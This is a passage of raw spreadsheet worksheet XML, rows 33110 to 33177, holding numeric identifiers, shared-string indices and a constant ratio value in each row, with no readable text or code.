      <c r="C33110" s="2" t="s">
        <v>31872</v>
      </c>
      <c r="D33110" s="2">
        <v>1.0</v>
      </c>
      <c r="E33110" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33110" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33111" ht="15.75" customHeight="1">
      <c r="A33111" s="1">
        <v>26265.0</v>
      </c>
      <c r="B33111" s="2">
        <v>1.6377141E7</v>
      </c>
      <c r="C33111" s="2" t="s">
        <v>31873</v>
      </c>
      <c r="D33111" s="2">
        <v>1.0</v>
      </c>
      <c r="E33111" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33111" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33112" ht="15.75" customHeight="1">
      <c r="A33112" s="1">
        <v>26266.0</v>
      </c>
      <c r="B33112" s="2">
        <v>1.6377141E7</v>
      </c>
      <c r="C33112" s="2" t="s">
        <v>31874</v>
      </c>
      <c r="D33112" s="2">
        <v>1.0</v>
      </c>
      <c r="E33112" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33112" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33113" ht="15.75" customHeight="1">
      <c r="A33113" s="1">
        <v>26756.0</v>
      </c>
      <c r="B33113" s="2">
        <v>1.8407269E7</v>
      </c>
      <c r="C33113" s="2" t="s">
        <v>31875</v>
      </c>
      <c r="D33113" s="2">
        <v>1.0</v>
      </c>
      <c r="E33113" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33113" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33114" ht="15.75" customHeight="1">
      <c r="A33114" s="1">
        <v>26850.0</v>
      </c>
      <c r="B33114" s="2">
        <v>1.9010525E7</v>
      </c>
      <c r="C33114" s="2" t="s">
        <v>31876</v>
      </c>
      <c r="D33114" s="2">
        <v>1.0</v>
      </c>
      <c r="E33114" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33114" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33115" ht="15.75" customHeight="1">
      <c r="A33115" s="1">
        <v>27195.0</v>
      </c>
      <c r="B33115" s="2">
        <v>2.0921696E7</v>
      </c>
      <c r="C33115" s="2" t="s">
        <v>31877</v>
      </c>
      <c r="D33115" s="2">
        <v>1.0</v>
      </c>
      <c r="E33115" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33115" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33116" ht="15.75" customHeight="1">
      <c r="A33116" s="1">
        <v>27245.0</v>
      </c>
      <c r="B33116" s="2">
        <v>2.1054836E7</v>
      </c>
      <c r="C33116" s="2" t="s">
        <v>31878</v>
      </c>
      <c r="D33116" s="2">
        <v>1.0</v>
      </c>
      <c r="E33116" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33116" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33117" ht="15.75" customHeight="1">
      <c r="A33117" s="1">
        <v>27522.0</v>
      </c>
      <c r="B33117" s="2">
        <v>2.2168174E7</v>
      </c>
      <c r="C33117" s="2" t="s">
        <v>31879</v>
      </c>
      <c r="D33117" s="2">
        <v>1.0</v>
      </c>
      <c r="E33117" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33117" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33118" ht="15.75" customHeight="1">
      <c r="A33118" s="1">
        <v>27543.0</v>
      </c>
      <c r="B33118" s="2">
        <v>2.232777E7</v>
      </c>
      <c r="C33118" s="2" t="s">
        <v>31880</v>
      </c>
      <c r="D33118" s="2">
        <v>1.0</v>
      </c>
      <c r="E33118" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33118" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33119" ht="15.75" customHeight="1">
      <c r="A33119" s="1">
        <v>27982.0</v>
      </c>
      <c r="B33119" s="2">
        <v>2.4042399E7</v>
      </c>
      <c r="C33119" s="2" t="s">
        <v>31881</v>
      </c>
      <c r="D33119" s="2">
        <v>1.0</v>
      </c>
      <c r="E33119" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33119" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33120" ht="15.75" customHeight="1">
      <c r="A33120" s="1">
        <v>27984.0</v>
      </c>
      <c r="B33120" s="2">
        <v>2.4042399E7</v>
      </c>
      <c r="C33120" s="2" t="s">
        <v>31882</v>
      </c>
      <c r="D33120" s="2">
        <v>1.0</v>
      </c>
      <c r="E33120" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33120" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33121" ht="15.75" customHeight="1">
      <c r="A33121" s="1">
        <v>28030.0</v>
      </c>
      <c r="B33121" s="2">
        <v>2.4450881E7</v>
      </c>
      <c r="C33121" s="2" t="s">
        <v>31883</v>
      </c>
      <c r="D33121" s="2">
        <v>1.0</v>
      </c>
      <c r="E33121" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33121" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33122" ht="15.75" customHeight="1">
      <c r="A33122" s="1">
        <v>28384.0</v>
      </c>
      <c r="B33122" s="2">
        <v>2.6119611E7</v>
      </c>
      <c r="C33122" s="2" t="s">
        <v>31884</v>
      </c>
      <c r="D33122" s="2">
        <v>1.0</v>
      </c>
      <c r="E33122" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33122" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33123" ht="15.75" customHeight="1">
      <c r="A33123" s="1">
        <v>28590.0</v>
      </c>
      <c r="B33123" s="2">
        <v>2.6957543E7</v>
      </c>
      <c r="C33123" s="2" t="s">
        <v>31857</v>
      </c>
      <c r="D33123" s="2">
        <v>1.0</v>
      </c>
      <c r="E33123" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33123" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33124" ht="15.75" customHeight="1">
      <c r="A33124" s="1">
        <v>28607.0</v>
      </c>
      <c r="B33124" s="2">
        <v>2.7105135E7</v>
      </c>
      <c r="C33124" s="2" t="s">
        <v>31710</v>
      </c>
      <c r="D33124" s="2">
        <v>1.0</v>
      </c>
      <c r="E33124" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33124" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33125" ht="15.75" customHeight="1">
      <c r="A33125" s="1">
        <v>28795.0</v>
      </c>
      <c r="B33125" s="2">
        <v>2.8564638E7</v>
      </c>
      <c r="C33125" s="2" t="s">
        <v>31885</v>
      </c>
      <c r="D33125" s="2">
        <v>1.0</v>
      </c>
      <c r="E33125" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33125" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33126" ht="15.75" customHeight="1">
      <c r="A33126" s="1">
        <v>29429.0</v>
      </c>
      <c r="B33126" s="2">
        <v>3.2219188E7</v>
      </c>
      <c r="C33126" s="2" t="s">
        <v>31886</v>
      </c>
      <c r="D33126" s="2">
        <v>1.0</v>
      </c>
      <c r="E33126" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33126" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33127" ht="15.75" customHeight="1">
      <c r="A33127" s="1">
        <v>29681.0</v>
      </c>
      <c r="B33127" s="2">
        <v>3.4051874E7</v>
      </c>
      <c r="C33127" s="2" t="s">
        <v>31887</v>
      </c>
      <c r="D33127" s="2">
        <v>1.0</v>
      </c>
      <c r="E33127" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33127" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33128" ht="15.75" customHeight="1">
      <c r="A33128" s="1">
        <v>29872.0</v>
      </c>
      <c r="B33128" s="2">
        <v>3.6022638E7</v>
      </c>
      <c r="C33128" s="2" t="s">
        <v>31888</v>
      </c>
      <c r="D33128" s="2">
        <v>1.0</v>
      </c>
      <c r="E33128" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33128" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33129" ht="15.75" customHeight="1">
      <c r="A33129" s="1">
        <v>30250.0</v>
      </c>
      <c r="B33129" s="2">
        <v>3.7564385E7</v>
      </c>
      <c r="C33129" s="2" t="s">
        <v>31889</v>
      </c>
      <c r="D33129" s="2">
        <v>1.0</v>
      </c>
      <c r="E33129" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33129" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33130" ht="15.75" customHeight="1">
      <c r="A33130" s="1">
        <v>30464.0</v>
      </c>
      <c r="B33130" s="2">
        <v>3.9492736E7</v>
      </c>
      <c r="C33130" s="2" t="s">
        <v>31890</v>
      </c>
      <c r="D33130" s="2">
        <v>1.0</v>
      </c>
      <c r="E33130" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33130" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33131" ht="15.75" customHeight="1">
      <c r="A33131" s="1">
        <v>30644.0</v>
      </c>
      <c r="B33131" s="2">
        <v>4174659.0</v>
      </c>
      <c r="C33131" s="2" t="s">
        <v>31891</v>
      </c>
      <c r="D33131" s="2">
        <v>1.0</v>
      </c>
      <c r="E33131" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33131" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33132" ht="15.75" customHeight="1">
      <c r="A33132" s="1">
        <v>31141.0</v>
      </c>
      <c r="B33132" s="2">
        <v>4889824.0</v>
      </c>
      <c r="C33132" s="2" t="s">
        <v>31892</v>
      </c>
      <c r="D33132" s="2">
        <v>1.0</v>
      </c>
      <c r="E33132" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33132" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33133" ht="15.75" customHeight="1">
      <c r="A33133" s="1">
        <v>31170.0</v>
      </c>
      <c r="B33133" s="2">
        <v>4907363.0</v>
      </c>
      <c r="C33133" s="2" t="s">
        <v>31893</v>
      </c>
      <c r="D33133" s="2">
        <v>1.0</v>
      </c>
      <c r="E33133" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33133" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33134" ht="15.75" customHeight="1">
      <c r="A33134" s="1">
        <v>31501.0</v>
      </c>
      <c r="B33134" s="2">
        <v>5.0682317E7</v>
      </c>
      <c r="C33134" s="2" t="s">
        <v>31894</v>
      </c>
      <c r="D33134" s="2">
        <v>1.0</v>
      </c>
      <c r="E33134" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33134" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33135" ht="15.75" customHeight="1">
      <c r="A33135" s="1">
        <v>31561.0</v>
      </c>
      <c r="B33135" s="2">
        <v>5121429.0</v>
      </c>
      <c r="C33135" s="2" t="s">
        <v>31895</v>
      </c>
      <c r="D33135" s="2">
        <v>1.0</v>
      </c>
      <c r="E33135" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33135" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33136" ht="15.75" customHeight="1">
      <c r="A33136" s="1">
        <v>31829.0</v>
      </c>
      <c r="B33136" s="2">
        <v>5253711.0</v>
      </c>
      <c r="C33136" s="2" t="s">
        <v>31896</v>
      </c>
      <c r="D33136" s="2">
        <v>1.0</v>
      </c>
      <c r="E33136" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33136" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33137" ht="15.75" customHeight="1">
      <c r="A33137" s="1">
        <v>32007.0</v>
      </c>
      <c r="B33137" s="2">
        <v>5.3453089E7</v>
      </c>
      <c r="C33137" s="2" t="s">
        <v>31897</v>
      </c>
      <c r="D33137" s="2">
        <v>1.0</v>
      </c>
      <c r="E33137" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33137" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33138" ht="15.75" customHeight="1">
      <c r="A33138" s="1">
        <v>32013.0</v>
      </c>
      <c r="B33138" s="2">
        <v>5.3488065E7</v>
      </c>
      <c r="C33138" s="2" t="s">
        <v>31897</v>
      </c>
      <c r="D33138" s="2">
        <v>1.0</v>
      </c>
      <c r="E33138" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33138" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33139" ht="15.75" customHeight="1">
      <c r="A33139" s="1">
        <v>32489.0</v>
      </c>
      <c r="B33139" s="2">
        <v>5.7006194E7</v>
      </c>
      <c r="C33139" s="2" t="s">
        <v>31898</v>
      </c>
      <c r="D33139" s="2">
        <v>1.0</v>
      </c>
      <c r="E33139" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33139" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33140" ht="15.75" customHeight="1">
      <c r="A33140" s="1">
        <v>32977.0</v>
      </c>
      <c r="B33140" s="2">
        <v>6561542.0</v>
      </c>
      <c r="C33140" s="2" t="s">
        <v>31899</v>
      </c>
      <c r="D33140" s="2">
        <v>1.0</v>
      </c>
      <c r="E33140" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33140" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33141" ht="15.75" customHeight="1">
      <c r="A33141" s="1">
        <v>33025.0</v>
      </c>
      <c r="B33141" s="2">
        <v>6669403.0</v>
      </c>
      <c r="C33141" s="2" t="s">
        <v>31900</v>
      </c>
      <c r="D33141" s="2">
        <v>1.0</v>
      </c>
      <c r="E33141" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33141" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33142" ht="15.75" customHeight="1">
      <c r="A33142" s="1">
        <v>33043.0</v>
      </c>
      <c r="B33142" s="2">
        <v>6739237.0</v>
      </c>
      <c r="C33142" s="2" t="s">
        <v>31901</v>
      </c>
      <c r="D33142" s="2">
        <v>1.0</v>
      </c>
      <c r="E33142" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33142" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33143" ht="15.75" customHeight="1">
      <c r="A33143" s="1">
        <v>33062.0</v>
      </c>
      <c r="B33143" s="2">
        <v>6828489.0</v>
      </c>
      <c r="C33143" s="2" t="s">
        <v>31902</v>
      </c>
      <c r="D33143" s="2">
        <v>1.0</v>
      </c>
      <c r="E33143" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33143" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33144" ht="15.75" customHeight="1">
      <c r="A33144" s="1">
        <v>34035.0</v>
      </c>
      <c r="B33144" s="2">
        <v>9560612.0</v>
      </c>
      <c r="C33144" s="2" t="s">
        <v>31903</v>
      </c>
      <c r="D33144" s="2">
        <v>1.0</v>
      </c>
      <c r="E33144" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33144" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33145" ht="15.75" customHeight="1">
      <c r="A33145" s="1">
        <v>34082.0</v>
      </c>
      <c r="B33145" s="2">
        <v>9680062.0</v>
      </c>
      <c r="C33145" s="2" t="s">
        <v>31904</v>
      </c>
      <c r="D33145" s="2">
        <v>1.0</v>
      </c>
      <c r="E33145" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33145" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33146" ht="15.75" customHeight="1">
      <c r="A33146" s="1">
        <v>34165.0</v>
      </c>
      <c r="B33146" s="2">
        <v>9915754.0</v>
      </c>
      <c r="C33146" s="2" t="s">
        <v>31905</v>
      </c>
      <c r="D33146" s="2">
        <v>1.0</v>
      </c>
      <c r="E33146" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33146" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33147" ht="15.75" customHeight="1">
      <c r="A33147" s="1">
        <v>384.0</v>
      </c>
      <c r="B33147" s="2">
        <v>1.6378646E7</v>
      </c>
      <c r="C33147" s="2" t="s">
        <v>31906</v>
      </c>
      <c r="D33147" s="2">
        <v>1.0</v>
      </c>
      <c r="E33147" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33147" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="33148" ht="15.75" customHeight="1">
      <c r="A33148" s="1">
        <v>607.0</v>
      </c>
      <c r="B33148" s="2">
        <v>1.9400117E7</v>
      </c>
      <c r="C33148" s="2" t="s">
        <v>31907</v>
      </c>
      <c r="D33148" s="2">
        <v>1.0</v>
      </c>
      <c r="E33148" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33148" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="33149" ht="15.75" customHeight="1">
      <c r="A33149" s="1">
        <v>657.0</v>
      </c>
      <c r="B33149" s="2">
        <v>2.0017825E7</v>
      </c>
      <c r="C33149" s="2" t="s">
        <v>31908</v>
      </c>
      <c r="D33149" s="2">
        <v>1.0</v>
      </c>
      <c r="E33149" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33149" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="33150" ht="15.75" customHeight="1">
      <c r="A33150" s="1">
        <v>1067.0</v>
      </c>
      <c r="B33150" s="2">
        <v>2.3531061E7</v>
      </c>
      <c r="C33150" s="2" t="s">
        <v>31909</v>
      </c>
      <c r="D33150" s="2">
        <v>1.0</v>
      </c>
      <c r="E33150" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33150" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="33151" ht="15.75" customHeight="1">
      <c r="A33151" s="1">
        <v>1493.0</v>
      </c>
      <c r="B33151" s="2">
        <v>2.7213122E7</v>
      </c>
      <c r="C33151" s="2" t="s">
        <v>31910</v>
      </c>
      <c r="D33151" s="2">
        <v>1.0</v>
      </c>
      <c r="E33151" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33151" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="33152" ht="15.75" customHeight="1">
      <c r="A33152" s="1">
        <v>1603.0</v>
      </c>
      <c r="B33152" s="2">
        <v>2.7815067E7</v>
      </c>
      <c r="C33152" s="2" t="s">
        <v>31911</v>
      </c>
      <c r="D33152" s="2">
        <v>1.0</v>
      </c>
      <c r="E33152" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33152" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="33153" ht="15.75" customHeight="1">
      <c r="A33153" s="1">
        <v>2226.0</v>
      </c>
      <c r="B33153" s="2">
        <v>3.2210899E7</v>
      </c>
      <c r="C33153" s="2" t="s">
        <v>31912</v>
      </c>
      <c r="D33153" s="2">
        <v>1.0</v>
      </c>
      <c r="E33153" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33153" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="33154" ht="15.75" customHeight="1">
      <c r="A33154" s="1">
        <v>2289.0</v>
      </c>
      <c r="B33154" s="2">
        <v>3.2584305E7</v>
      </c>
      <c r="C33154" s="2" t="s">
        <v>31913</v>
      </c>
      <c r="D33154" s="2">
        <v>1.0</v>
      </c>
      <c r="E33154" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33154" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="33155" ht="15.75" customHeight="1">
      <c r="A33155" s="1">
        <v>2419.0</v>
      </c>
      <c r="B33155" s="2">
        <v>3.3556871E7</v>
      </c>
      <c r="C33155" s="2" t="s">
        <v>31914</v>
      </c>
      <c r="D33155" s="2">
        <v>1.0</v>
      </c>
      <c r="E33155" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33155" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="33156" ht="15.75" customHeight="1">
      <c r="A33156" s="1">
        <v>3234.0</v>
      </c>
      <c r="B33156" s="2">
        <v>3.734709E7</v>
      </c>
      <c r="C33156" s="2" t="s">
        <v>31915</v>
      </c>
      <c r="D33156" s="2">
        <v>1.0</v>
      </c>
      <c r="E33156" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33156" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="33157" ht="15.75" customHeight="1">
      <c r="A33157" s="1">
        <v>3797.0</v>
      </c>
      <c r="B33157" s="2">
        <v>3.9968643E7</v>
      </c>
      <c r="C33157" s="2" t="s">
        <v>31916</v>
      </c>
      <c r="D33157" s="2">
        <v>1.0</v>
      </c>
      <c r="E33157" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33157" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="33158" ht="15.75" customHeight="1">
      <c r="A33158" s="1">
        <v>4279.0</v>
      </c>
      <c r="B33158" s="2">
        <v>4.1885825E7</v>
      </c>
      <c r="C33158" s="2" t="s">
        <v>31917</v>
      </c>
      <c r="D33158" s="2">
        <v>1.0</v>
      </c>
      <c r="E33158" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33158" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="33159" ht="15.75" customHeight="1">
      <c r="A33159" s="1">
        <v>4551.0</v>
      </c>
      <c r="B33159" s="2">
        <v>4.2683967E7</v>
      </c>
      <c r="C33159" s="2" t="s">
        <v>31918</v>
      </c>
      <c r="D33159" s="2">
        <v>1.0</v>
      </c>
      <c r="E33159" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33159" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="33160" ht="15.75" customHeight="1">
      <c r="A33160" s="1">
        <v>4883.0</v>
      </c>
      <c r="B33160" s="2">
        <v>4.3861914E7</v>
      </c>
      <c r="C33160" s="2" t="s">
        <v>31919</v>
      </c>
      <c r="D33160" s="2">
        <v>1.0</v>
      </c>
      <c r="E33160" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33160" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="33161" ht="15.75" customHeight="1">
      <c r="A33161" s="1">
        <v>5971.0</v>
      </c>
      <c r="B33161" s="2">
        <v>4.7353053E7</v>
      </c>
      <c r="C33161" s="2" t="s">
        <v>31920</v>
      </c>
      <c r="D33161" s="2">
        <v>1.0</v>
      </c>
      <c r="E33161" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33161" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="33162" ht="15.75" customHeight="1">
      <c r="A33162" s="1">
        <v>6743.0</v>
      </c>
      <c r="B33162" s="2">
        <v>4.937148E7</v>
      </c>
      <c r="C33162" s="2" t="s">
        <v>31921</v>
      </c>
      <c r="D33162" s="2">
        <v>1.0</v>
      </c>
      <c r="E33162" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33162" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="33163" ht="15.75" customHeight="1">
      <c r="A33163" s="1">
        <v>7276.0</v>
      </c>
      <c r="B33163" s="2">
        <v>5.0786364E7</v>
      </c>
      <c r="C33163" s="2" t="s">
        <v>31922</v>
      </c>
      <c r="D33163" s="2">
        <v>1.0</v>
      </c>
      <c r="E33163" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33163" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="33164" ht="15.75" customHeight="1">
      <c r="A33164" s="1">
        <v>7466.0</v>
      </c>
      <c r="B33164" s="2">
        <v>5.1268782E7</v>
      </c>
      <c r="C33164" s="2" t="s">
        <v>31923</v>
      </c>
      <c r="D33164" s="2">
        <v>1.0</v>
      </c>
      <c r="E33164" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33164" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="33165" ht="15.75" customHeight="1">
      <c r="A33165" s="1">
        <v>7756.0</v>
      </c>
      <c r="B33165" s="2">
        <v>5.2087E7</v>
      </c>
      <c r="C33165" s="2" t="s">
        <v>31924</v>
      </c>
      <c r="D33165" s="2">
        <v>1.0</v>
      </c>
      <c r="E33165" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33165" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="33166" ht="15.75" customHeight="1">
      <c r="A33166" s="1">
        <v>7954.0</v>
      </c>
      <c r="B33166" s="2">
        <v>5.2654314E7</v>
      </c>
      <c r="C33166" s="2" t="s">
        <v>31925</v>
      </c>
      <c r="D33166" s="2">
        <v>1.0</v>
      </c>
      <c r="E33166" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33166" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="33167" ht="15.75" customHeight="1">
      <c r="A33167" s="1">
        <v>8070.0</v>
      </c>
      <c r="B33167" s="2">
        <v>5.294988E7</v>
      </c>
      <c r="C33167" s="2" t="s">
        <v>31926</v>
      </c>
      <c r="D33167" s="2">
        <v>1.0</v>
      </c>
      <c r="E33167" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33167" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="33168" ht="15.75" customHeight="1">
      <c r="A33168" s="1">
        <v>8133.0</v>
      </c>
      <c r="B33168" s="2">
        <v>5.3111723E7</v>
      </c>
      <c r="C33168" s="2" t="s">
        <v>31927</v>
      </c>
      <c r="D33168" s="2">
        <v>1.0</v>
      </c>
      <c r="E33168" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33168" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="33169" ht="15.75" customHeight="1">
      <c r="A33169" s="1">
        <v>8661.0</v>
      </c>
      <c r="B33169" s="2">
        <v>5.435453E7</v>
      </c>
      <c r="C33169" s="2" t="s">
        <v>31928</v>
      </c>
      <c r="D33169" s="2">
        <v>1.0</v>
      </c>
      <c r="E33169" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33169" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="33170" ht="15.75" customHeight="1">
      <c r="A33170" s="1">
        <v>9181.0</v>
      </c>
      <c r="B33170" s="2">
        <v>5.538062E7</v>
      </c>
      <c r="C33170" s="2" t="s">
        <v>31929</v>
      </c>
      <c r="D33170" s="2">
        <v>1.0</v>
      </c>
      <c r="E33170" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33170" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="33171" ht="15.75" customHeight="1">
      <c r="A33171" s="1">
        <v>9240.0</v>
      </c>
      <c r="B33171" s="2">
        <v>5.5465936E7</v>
      </c>
      <c r="C33171" s="2" t="s">
        <v>31930</v>
      </c>
      <c r="D33171" s="2">
        <v>1.0</v>
      </c>
      <c r="E33171" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33171" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="33172" ht="15.75" customHeight="1">
      <c r="A33172" s="1">
        <v>9245.0</v>
      </c>
      <c r="B33172" s="2">
        <v>5.5471126E7</v>
      </c>
      <c r="C33172" s="2" t="s">
        <v>31931</v>
      </c>
      <c r="D33172" s="2">
        <v>1.0</v>
      </c>
      <c r="E33172" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33172" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="33173" ht="15.75" customHeight="1">
      <c r="A33173" s="1">
        <v>9512.0</v>
      </c>
      <c r="B33173" s="2">
        <v>5.596453E7</v>
      </c>
      <c r="C33173" s="2" t="s">
        <v>31932</v>
      </c>
      <c r="D33173" s="2">
        <v>1.0</v>
      </c>
      <c r="E33173" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33173" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="33174" ht="15.75" customHeight="1">
      <c r="A33174" s="1">
        <v>9688.0</v>
      </c>
      <c r="B33174" s="2">
        <v>5.6345286E7</v>
      </c>
      <c r="C33174" s="2" t="s">
        <v>31933</v>
      </c>
      <c r="D33174" s="2">
        <v>1.0</v>
      </c>
      <c r="E33174" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33174" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="33175" ht="15.75" customHeight="1">
      <c r="A33175" s="1">
        <v>9703.0</v>
      </c>
      <c r="B33175" s="2">
        <v>5.637133E7</v>
      </c>
      <c r="C33175" s="2" t="s">
        <v>31934</v>
      </c>
      <c r="D33175" s="2">
        <v>1.0</v>
      </c>
      <c r="E33175" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33175" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="33176" ht="15.75" customHeight="1">
      <c r="A33176" s="1">
        <v>9902.0</v>
      </c>
      <c r="B33176" s="2">
        <v>5.6771662E7</v>
      </c>
      <c r="C33176" s="2" t="s">
        <v>31935</v>
      </c>
      <c r="D33176" s="2">
        <v>1.0</v>
      </c>
      <c r="E33176" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33176" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="33177" ht="15.75" customHeight="1">
      <c r="A33177" s="1">
        <v>10050.0</v>
      </c>
      <c r="B33177" s="2">
        <v>5.7106683E7</v>
      </c>
      <c r="C33177" s="2" t="s">
        <v>31936</v>
      </c>
      <c r="D33177" s="2">
        <v>1.0</v>
